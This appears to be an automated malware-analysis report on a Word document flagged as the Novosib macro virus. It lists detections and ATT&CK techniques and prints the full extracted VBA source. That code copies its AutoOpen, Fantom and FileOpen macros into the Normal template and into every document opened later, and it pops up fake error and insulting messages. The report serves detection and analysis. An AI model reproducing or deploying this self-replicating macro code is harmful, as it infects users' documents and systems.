MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing VBA macros. The AutoOpen macro is present and designed to execute other macros, including 'Fantom' and 'Fuck'. The presence of the 'Doc.Trojan.Novosib-1' ClamAV detection strongly suggests this is a known malware family. The AutoOpen macro is a common technique for initial execution of malicious code within Office documents.
Heuristics 4
-
ClamAV: Doc.Trojan.Novosib-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Novosib-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2491 bytes |
SHA-256: 6cc41f4034d671fb535b364b1251acdbe6d0ea6bd48f6f98fb3ed92923d8ba2f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "AutoOpen" Public Sub MAIN() Dim rus Dim j, Response, Msg, Style Dim i Style = vbCritical Msg = "Ïðîèçîøëà êðèòè÷åñêàÿ îøèáêà.Ïåðåçàïóñòèòå ïðèëîæåíèå. " On Error GoTo -1: On Error GoTo fail rus = 0 j = WordBasic.CountMacros(0, 0) For i = 1 To j If WordBasic.[MacroName$](i, 0, 0) = "Fantom" Then rus = 1 Next i If rus = 1 Then GoTo fail Response = MsgBox(Msg, Style) WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "Normal:AutoOp" WordBasic.MacroCopy WordBasic.[FileName$]() + ":Fantom", "Normal:Fantom" WordBasic.MacroCopy WordBasic.[FileName$]() + ":Fuck", "Normal:FileOpen" fail: End Sub Attribute VB_Name = "Fantom" Public Sub MAIN() 'Ïîñâåùàåòñÿ Èãîðþ Äàíèëîâó 'Çëîáíûé âèðóñîïèñàòåëü èç Íîâîñèáèðñêà End Sub Attribute VB_Name = "Fuck" Public Sub MAIN() Dim Novosib Dim Virus Dim Msg, Msb, Msa, Style, MyString, Response Dim Kota Dim Mordov Dim i Dim zuko Style = vbYesNo + DefaultButton2 Msg = "Ñäà¸òñÿ ìíå ÷òî âû ìóäàê áàòåíüêà?" Msa = "Çðÿ âû áàòåíüêà òàêîãî âûñîêîãî ìíåíèÿ î ñåáå!" Msb = "Âîò òóò ÿ ñ âàìè ïîëíîñòüþ ñîãëàñåí!" ' this macro loaded in normal template as FileOpen Virus = "Fuck" Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileOpen(False) On Error GoTo -1: On Error GoTo fail WordBasic.CurValues.FileOpen dlg WordBasic.Dialog.FileOpen dlg WordBasic.FileOpen dlg Response = MsgBox(Msg, Style) If Response = vbYes Then MyString = "Äà" Response = MsgBox(Msb) GoTo fol Else MyString = "Íåò" Response = MsgBox(Msa) fol: Kota = 0 Mordov = WordBasic.CountMacros(1, 0, 0) For i = 1 To Mordov zuko = WordBasic.[MacroName$](i, 1) If zuko = "Fantom" Then Kota = 1 Next i If Kota = 1 Then GoTo fail WordBasic.FileSaveAs WordBasic.[FileName$](), Format:=1 WordBasic.MacroCopy "Normal:AutoOp", WordBasic.[FileName$]() + ":AutoOpen" WordBasic.MacroCopy "Normal:Fantom", WordBasic.[FileName$]() + ":Fantom" WordBasic.MacroCopy "Normal:FileOpen", WordBasic.[FileName$]() + ":Fuck" fail: End If End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.